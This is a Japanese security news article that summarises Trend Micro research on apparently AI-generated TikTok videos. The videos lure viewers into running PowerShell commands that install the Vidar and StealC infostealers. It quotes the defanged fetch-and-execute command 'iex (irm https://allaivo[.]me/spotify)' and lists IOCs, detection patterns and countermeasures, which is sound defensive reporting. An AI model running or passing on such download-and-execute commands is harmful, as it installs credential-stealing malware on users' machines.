1. セキュリティ対策ラボ
  2. セキュリティニュース
  3. TikTokがマルウェアの温床に?AI生成動画でインフォスティーラーを拡散させるサイバー攻撃の手口

TikTokがマルウェアの温床に?AI生成動画でインフォスティーラーを拡散させるサイバー攻撃の手口

セキュリティニュース

投稿日時: 更新日時:

TikTokがマルウェアの温床に?AI生成動画でインフォスティーラー拡散させるサイバー攻撃の手口

トレンドマイクロ社は、TikTokを悪用した新たなマルウェア拡散キャンペーンを発見しました。攻撃者は、AIで生成したと見られる動画を通じて視聴者を騙し、「PowerShellコマンドの実行」を促すという、従来の検知手法では防ぎにくい高度なソーシャルエンジニアリング手法を採用しています。最終的に感染するのは「Vidar」や「StealC」といった情報窃取型マルウェアです。

攻撃の概要:TikTok × AI × PowerShell

今回トレンドマイクロ社が明らかにした攻撃手法は、従来のフィッシングやマルウェア配布の枠を超えた、ソーシャルメディアとAIを駆使した新たな社会工学的攻撃です。攻撃者はTikTokという動画プラットフォームを悪用し、ユーザーを騙して自らPowerShellコマンドを入力・実行させるという極めて巧妙な手法を取っています。

この攻撃では、AIで生成されたと見られる「顔出しのない解説動画」を使い、「ソフトウェアのアクティベーション方法」や「プレミアム機能の解除方法」と称して、PowerShellのコマンドを実行させる手順をナレーション付きで丁寧に解説しています。

TikTokの特性上、こうした動画は一見して怪しさを感じにくく、親しみやすいBGMや編集が施されていることから、ユーザーは疑いなく手順に従ってしまう可能性があります。

実際に確認された動画では、「Windowsキー + Rを押してPowerShellを起動し、以下のコマンドを入力してEnterキーを押す」と指示され、そのコマンドがリモートから悪意あるスクリプトをダウンロード・実行するものとなっています。

攻撃の概要:TikTok × AI × PowerShell1

画像:トレンドマイクロ

攻撃の概要:TikTok × AI × PowerShell2

画像:トレンドマイクロ

動画で悪意のあるコード実行を指示

ここで特筆すべきは、悪意あるコード自体はTikTok上には一切存在しておらず、すべて音声と映像による“口頭指示”にとどまっている点です。

このため、従来のアンチウイルスやEDR,URLフィルタでは検知が非常に困難であり、ユーザーの行動こそが感染のトリガーとなる、新しいタイプのソーシャルエンジニアリングと言えます。

AI製動画で自動化

加えて、投稿された複数の動画にはAI生成音声が使われ、内容の構成やビジュアルもテンプレート化されており、動画制作が自動化されている可能性が高いとされています。これは、攻撃者がAIツールを用いて大量かつ効率的にマルウェア配布用動画を量産し、不特定多数のユーザーにリーチすることを可能にしていることを意味します。

このように、攻撃者はTikTokという「セキュリティの死角」となりがちなプラットフォームを活用し、AIによる信頼性演出とユーザー自身の手によるマルウェア実行という構図を巧みに組み合わせ、これまでにない拡散力と実行成功率を獲得しています。これは、情報システム部門にとって極めて厄介な新手の攻撃パターンであり、従来のセキュリティ対策では防ぎきれない領域に差し掛かっていることを示唆しています。

実際の感染手順:PowerShellから始まる4段階の攻撃フロー

以下が、攻撃の流れです:

  1. ユーザー誘導:TikTok動画が「Windows + R → PowerShell → 以下のコマンド入力」と誘導

  2. 初期スクリプト実行

    iex (irm https://allaivo[.]me/spotify)

  3. 第二ペイロード(VidarまたはStealC)取得と実行

    • 隠しディレクトリに保存

    • Windows Defenderから除外設定

    • 高権限でバックグラウンド実行

  4. 永続化と痕跡隠蔽

    • レジストリを通じて自動起動

    • 一時フォルダを削除

マルウェアはTelegramやSteamのプロフィールをC&Cサーバの仲介地点として活用することで、通信先を巧妙に隠蔽しています。

一連の疑わしいアカウント

  • @gitallowed

  • @zane.houghton

  • @allaivo2

  • @sysglow.wow

  • @alexfixpc

  • @digitaldreams771

類似する手口:過去に話題となった「ClickFix」との共通点

今回確認されたTikTokを悪用したマルウェア配布キャンペーンは、その手法において、過去にセキュリティ業界で注目を集めた「ClickFix」攻撃と非常に類似した構造を持っています。ClickFixは、ユーザーに「ブラウザの問題を修正する」や「設定を最適化する」と誤認させ、ブラウザの開発者コンソールにJavaScriptコードを直接貼り付けて実行させるという手口で知られています。

いずれも共通しているのは、「ユーザー自身に手を動かさせる」ことを巧みに誘導する社会工学的アプローチです。CLICKFIXがブラウザの開発者ツールを利用していたのに対し、今回のTikTokキャンペーンではPowerShellというOS標準の管理ツールを使わせています。どちらの攻撃も「システムの改善」や「便利な機能の有効化」といった“善意に見える目的”を前面に押し出すことで、ユーザーに危機感ではなく期待感を与え、マルウェア実行という本質を隠蔽している点が共通しています。

さらに、実行されるコード自体が一見して難解ではなく、短くコピー&ペーストしやすい形式になっていることも類似点です。これにより、ITリテラシーの高くない一般ユーザーや学生、個人事業主などが、疑念を抱かずそのまま実行してしまうリスクが高まっています。

こうした攻撃は、「技術的な脆弱性を突く」のではなく「人間の判断を欺く」ことに特化しており、技術的対策だけでは防ぎきれないヒューマンファクターのリスクを浮き彫りにしています。

情報システム部門が講じるべき対策:

  1. PowerShell実行ログの監視

    • iexirmを含むコマンド実行を検知

    • iex (irm https://」形式のコマンドは特に要警戒

  2. ソーシャルメディアモニタリング

    • SNS経由の技術系情報や動画に対する社員のアクセス傾向を可視化

    • 高インタラクション投稿への注意喚起

  3. 従業員教育のアップデート

    • 「リンク型フィッシング」だけでなく「音声・映像による信頼性偽装型」の脅威を教育

    • 「PowerShellを手動で実行させる手口」に関する注意喚起

  4. ふるまい検知・EDR導入の推進

    • 未知のURLからのファイル取得や、隠しフォルダ作成、レジストリ改ざんの検出

    • Defender除外設定や不自然なファイル削除の監視

  5. Trend Vision One™のような統合型プラットフォームの活用

    • IOC照合、ハンティングクエリ、自動分析レポートによる攻撃の早期検知と封じ込め

    • TikTokやTelegramといった“非伝統的攻撃経路”への拡張対応

IOC情報(インジケータ)

下記は今回の攻撃で確認されたIOCです。組織内のログと突き合わせることで潜在的な感染有無を確認してください:

  • PowerShell URL:

    • hxxps://allaivo[.]me/spotify

    • hxxps://amssh[.]co/file[.]exe

    • hxxps://amssh[.]co/script[.]ps1

  • C&C:

    • hxxps://steamcommunity[.]com/profiles/76561199846773220

    • hxxps://t[.]me/v00rd

    • hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php

  • ファイルハッシュ:

    • 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b

    • afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5

    • b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886

参照

https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html

関連記事

WindowsのTCP/IP IPv6を使用する全てのシステムに影響を与える緊急度の高い 脆弱性(CVE-2024-38063)WindowsのTCP/IP IPv6を使用する全てのシステムに影響を与える緊急度の高い 脆弱性(CVE-2024-38063) 偽のグーグルクロームアップデートでPowerShellを実行させる偽のグーグル クロームのエラーで悪意のあるPowerShellを実行させるよう誘導-ClickFixによるソーシャルエンジニアリング 株式会社イセトーがランサムウェア感染と被害を発表イセトーのランサムウェアとサイバー攻撃による情報漏洩のまとめ Default ThumbnailWelcomeHRを運営するワークスタイルテックが約15万人の個人情報漏洩を発表 仮想通貨エアドロ「ハムスターコンバット」は世界的に1億5000万人がインストールされているとされています。ESETはこの「ハムスターコンバット」の偽のダウンロードページでマルウェアが配布されている事を警告しました。偽のハムスターコンバットでマルウェア配布を確認 ランサムウェア 事例解説|被害の内容をランサムウェアの種類別に紹介ランサムウェアの事例を解説 Default ThumbnailBtoBの展示会で利用できるイベントコンパニオン事務所のご紹介 トロイの木馬化された「jQuery」がnpmやGitHubで拡散トロイの木馬化された「jQuery」がnpmやGitHubで拡散 Default Thumbnail【2023年版】BtoBの展示会で利用できる補助金・助成金をご紹介!